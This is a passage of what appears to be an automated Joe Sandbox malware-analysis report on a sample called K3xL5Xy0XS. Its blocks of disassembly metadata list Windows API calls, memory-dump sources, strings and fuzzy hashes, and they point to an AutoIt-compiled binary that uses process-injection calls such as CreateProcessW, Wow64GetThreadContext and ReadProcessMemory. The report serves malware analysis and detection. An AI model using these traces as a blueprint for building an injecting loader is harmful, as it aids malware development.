                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001C3B0F,SwapMouseButtons,00000004,?), ref: 001C3B40
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001C3B0F,SwapMouseButtons,00000004,?), ref: 001C3B61
                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001C3B0F,SwapMouseButtons,00000004,?), ref: 001C3B83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  • API String ID: 3677997916-824357125
                                                                                  • Opcode ID: 5b67070d417f467cf636e017c857964c551e3638dce55ad416bdb940a01db89b
                                                                                  • Instruction ID: da04bfe7b7ffef06207fdee78a6558ddb5a01f2f77c9fdfecbe453351dcde80c
                                                                                  • Opcode Fuzzy Hash: 5b67070d417f467cf636e017c857964c551e3638dce55ad416bdb940a01db89b
                                                                                  • Instruction Fuzzy Hash: E31118B5510208FEDB218FA5DC48FAEB7B8EF14755B108459A815D7210E331DE409B64
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01684BD5
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01684BF9
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01684C1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                  • Instruction ID: a9882d25acd3b71d071e62a92c19f0b15480b71c5718bcff2ad19521c08fdbb9
                                                                                  • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                  • Instruction Fuzzy Hash: FF62FA70A142199BEB24DFA4CC44BDEB776EF58300F1091A9D20DEB390EB759E81CB59
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002033A2
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001C3A04
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                                  • String ID: Line:
                                                                                  • API String ID: 2289894680-1585850449
                                                                                  • Opcode ID: 605cef0ebff2b939fd0fbf3ae8ed5ba2480fb0d0d812d645f710c813a8165fe5
                                                                                  • Instruction ID: beecf2fcefb5fb4c25b70807a45109241c5743cce4f65fe07035a4a71f15d3d3
                                                                                  • Opcode Fuzzy Hash: 605cef0ebff2b939fd0fbf3ae8ed5ba2480fb0d0d812d645f710c813a8165fe5
                                                                                  • Instruction Fuzzy Hash: 7031E571408341AAD725EB20EC49FEBB3E8AB64314F00496EF4A9831D1DB70DA58C7C6
                                                                                  APIs
                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00202C8C
                                                                                    • Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2
                                                                                    • Part of subcall function 001C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C2DC4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                  • String ID: X$`e(
                                                                                  • API String ID: 779396738-2230957894
                                                                                  • Opcode ID: 883497445d62c915f633039cd6fc5bdb62997d24dabedc37fce2d4857d10511e
                                                                                  • Instruction ID: ce76a9642683c0737f1bf90d64d047fb6141af7a4d19d781fd82fd91dcf388cf
                                                                                  • Opcode Fuzzy Hash: 883497445d62c915f633039cd6fc5bdb62997d24dabedc37fce2d4857d10511e
                                                                                  • Instruction Fuzzy Hash: 8B21D870A103589FDB01EF94C809BEE7BFCAF58304F00805EE405B7281DBB499598F61
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001E0668
                                                                                    • Part of subcall function 001E32A4: RaiseException.KERNEL32(?,?,?,001E068A,?,00291444,?,?,?,?,?,?,001E068A,001C1129,00288738,001C1129), ref: 001E3304
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001E0685
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                  • String ID: Unknown exception
                                                                                  • API String ID: 3476068407-410509341
                                                                                  • Opcode ID: 1d20638b991c069cb41984aad248272404f4c8d0f254ac202e6f30874699a152
                                                                                  • Instruction ID: 2435987e719a0ec7e4740d2ba5580999f26d37e5f3b67ff53935aa21814bb3fb
                                                                                  • Opcode Fuzzy Hash: 1d20638b991c069cb41984aad248272404f4c8d0f254ac202e6f30874699a152
                                                                                  • Instruction Fuzzy Hash: 3CF04634800A8D73CB04BAA6DC4AD9E7B7D5E14300BA04135F924D65D1EFB1DBA6CAC0
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0023302F
                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00233044
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$FileNamePath
                                                                                  • String ID: aut
                                                                                  • API String ID: 3285503233-3010740371
                                                                                  • Opcode ID: 76b333ec0cf6d6e8292ffcbf76fe77ec362c7689337191c3b70bbd9a5cdf0042
                                                                                  • Instruction ID: 31bf7a55290bab5eddfefffdef5dffbd63679e2b4199cbc35beab45eb424a02c
                                                                                  • Opcode Fuzzy Hash: 76b333ec0cf6d6e8292ffcbf76fe77ec362c7689337191c3b70bbd9a5cdf0042
                                                                                  • Instruction Fuzzy Hash: 77D05E765003286BDA20A7A4AC4EFCB3A6CDB05751F0002A1BA55E20D1EAB09984CBD4
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002482F5
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 002482FC
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 002484DD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 146820519-0
                                                                                  • Opcode ID: b47b1fc59395a28bb0856ff30e89158a3316b34152fdd398956f86bb16138af4
                                                                                  • Instruction ID: 07ad52645397a08235d61d92dc6f2df3cd82e596df8ff1cb02c7208ecc5325bf
                                                                                  • Opcode Fuzzy Hash: b47b1fc59395a28bb0856ff30e89158a3316b34152fdd398956f86bb16138af4
                                                                                  • Instruction Fuzzy Hash: 3F126A71A283419FC714DF28C484B2EBBE1BF99318F14895DE8898B252DB71ED45CF92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9fb46a30a5ed3cde7e699768cccffc3ebcaaa396b6f4303940c0ebe16947f301
                                                                                  • Instruction ID: f00ca6c34c3b736aa01f23866e4d929fa0dc8b3e9ecf73c1ad147ad6c2beb35c
                                                                                  • Opcode Fuzzy Hash: 9fb46a30a5ed3cde7e699768cccffc3ebcaaa396b6f4303940c0ebe16947f301
                                                                                  • Instruction Fuzzy Hash: DA51C171D00A0E9FCB159FA5C849FBEBFBAAF55310F15005AFB06A7291D7319A02CB61
                                                                                  APIs
                                                                                    • Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C1BF4
                                                                                    • Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001C1BFC
                                                                                    • Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C1C07
                                                                                    • Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C1C12
                                                                                    • Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001C1C1A
                                                                                    • Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001C1C22
                                                                                    • Part of subcall function 001C1B4A: RegisterWindowMessageW.USER32(00000004,?,001C12C4), ref: 001C1BA2
                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001C136A
                                                                                  • OleInitialize.OLE32 ref: 001C1388
                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 002024AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1986988660-0
                                                                                  • Opcode ID: d05605be9e18b19c02c3dc45a8e05daaee92c4539c94f24e5e40392b0c17eec8
                                                                                  • Instruction ID: 3f546eab5805ec798f9ba100dc52c97adecc1eec6df0d8d29faaddd35ecdc1cc
                                                                                  • Opcode Fuzzy Hash: d05605be9e18b19c02c3dc45a8e05daaee92c4539c94f24e5e40392b0c17eec8
                                                                                  • Instruction Fuzzy Hash: 07719AB49213028FD785DF7BB94DA653AE4FBA9344396812FD41AC7261EB308825CF45
                                                                                  APIs
                                                                                    • Part of subcall function 001C3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001C3A04
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0022C259
                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0022C261
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0022C270
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                  • String ID:
                                                                                  • API String ID: 3500052701-0
                                                                                  • Opcode ID: bbb1d501b9a6b3fa0edeafd18a08a0b7ffaa3323c2fa3b0123c2fbe47f18adbc
                                                                                  • Instruction ID: c5ef4d622bbfb5bb42028fc9405259eb4d093b519a1dac64db5ebf79b05e50ce
                                                                                  • Opcode Fuzzy Hash: bbb1d501b9a6b3fa0edeafd18a08a0b7ffaa3323c2fa3b0123c2fbe47f18adbc
                                                                                  • Instruction Fuzzy Hash: 6C31C570914354BFEB22CFA4A859BEBBBEC9F16308F10049ED5DA97241C7745A84CB51
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,?,?,001F85CC,?,00288CC8,0000000C), ref: 001F8704
                                                                                  • GetLastError.KERNEL32(?,001F85CC,?,00288CC8,0000000C), ref: 001F870E
                                                                                  • __dosmaperr.LIBCMT ref: 001F8739
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2583163307-0
                                                                                  • Opcode ID: 18021b4a80ecf7371e17c94929ed941ab59ee28d78e4e619084554ae2594111e
                                                                                  • Instruction ID: 2b6a35a622feca5a9ec6cbdf0560899e9bd73089de4c825726e7bc3bb5cc12c6
                                                                                  • Opcode Fuzzy Hash: 18021b4a80ecf7371e17c94929ed941ab59ee28d78e4e619084554ae2594111e
                                                                                  • Instruction Fuzzy Hash: 4B012B33A05E6C2AD7247239784977E678A5B92779F3A0259FB18CB1D2DFB0CC818150
                                                                                  APIs
                                                                                  • TranslateMessage.USER32(?), ref: 001CDB7B
                                                                                  • DispatchMessageW.USER32(?), ref: 001CDB89
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001CDB9F
                                                                                  • Sleep.KERNEL32(0000000A), ref: 001CDBB1
                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00211CC9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3288985973-0
                                                                                  • Opcode ID: 3e710575b431395cfc2f0b0b2a520b83934e9d99cc14c819a0f24416ac245490
                                                                                  • Instruction ID: 7b6fe663ae3ebf8ecf29f885d401136b9abe14d69783a5325918cf7bddf5692f
                                                                                  • Opcode Fuzzy Hash: 3e710575b431395cfc2f0b0b2a520b83934e9d99cc14c819a0f24416ac245490
                                                                                  • Instruction Fuzzy Hash: D3F054305543419BE730CBA1EC49FDA73ECEF55311F604529E609830C0EB309494DB15
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00232CD4,?,?,?,00000004,00000001), ref: 00232FF2
                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00232CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00233006
                                                                                  • CloseHandle.KERNEL32(00000000,?,00232CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0023300D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 3397143404-0
                                                                                  • Opcode ID: 8a38b9279ff76c3683be8d4f41e21447711f6659f993fcbca1a540ad78c49dde
                                                                                  • Instruction ID: 21aa93c5c3eecc8152f73411a9c0625f5361623195fc9af9703b4a292d8b6f88
                                                                                  • Opcode Fuzzy Hash: 8a38b9279ff76c3683be8d4f41e21447711f6659f993fcbca1a540ad78c49dde
                                                                                  • Instruction Fuzzy Hash: D3E086366807147BD2302765BC0DF8B3A1CD786B72F204210F719790D056B0160142AC
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 001D17F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer
                                                                                  • String ID: CALL
                                                                                  • API String ID: 1385522511-4196123274
                                                                                  • Opcode ID: 0766b9946b4aba48ba842a7d9b5e0f5892df5ef1706d1ce05c9118bbc2b270a5
                                                                                  • Instruction ID: 9dc458ad34bc6b4e70c7e8d5ace4c2ff3ecb1c3911e9a8417fb317517d72ec6c
                                                                                  • Opcode Fuzzy Hash: 0766b9946b4aba48ba842a7d9b5e0f5892df5ef1706d1ce05c9118bbc2b270a5
                                                                                  • Instruction Fuzzy Hash: C1229A70608201EFC714CF14D484B6ABBF2BFA9314F24895EF4968B3A1D775E995CB82
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00236F6B
                                                                                    • Part of subcall function 001C4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EFD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad_wcslen
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                  • API String ID: 3312870042-2806939583
                                                                                  • Opcode ID: 0b20485b685491db3b751996cc767dcd91eec6769ebf356c7e623f9695b9c8ab
                                                                                  • Instruction ID: 15e58382a20f15e2f6947d8449dcaaf6f465bc6a5c3c62a3b249e9a875f3c6c4
                                                                                  • Opcode Fuzzy Hash: 0b20485b685491db3b751996cc767dcd91eec6769ebf356c7e623f9695b9c8ab
                                                                                  • Instruction Fuzzy Hash: 5AB181712182019FCB14EF24D491E6EB7E5BFB4304F04895DF896972A2EB30ED59CB92
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock
                                                                                  • String ID: EA06
                                                                                  • API String ID: 2638373210-3962188686
                                                                                  • Opcode ID: 94ce8386f26e4ac9243eb7ba4d499bebb98fac0fd29dedd5872499dae4460541
                                                                                  • Instruction ID: 95994636b274532fc8e9ce8b8529a520cfc3626bb4106c34d010d1b93e768505
                                                                                  • Opcode Fuzzy Hash: 94ce8386f26e4ac9243eb7ba4d499bebb98fac0fd29dedd5872499dae4460541
                                                                                  • Instruction Fuzzy Hash: 5E01F5B2904258BEDF28C7A8C816EAEBBF89B15301F00455AE152D21C1E5B4E7188B60
                                                                                  APIs
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001C3908
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
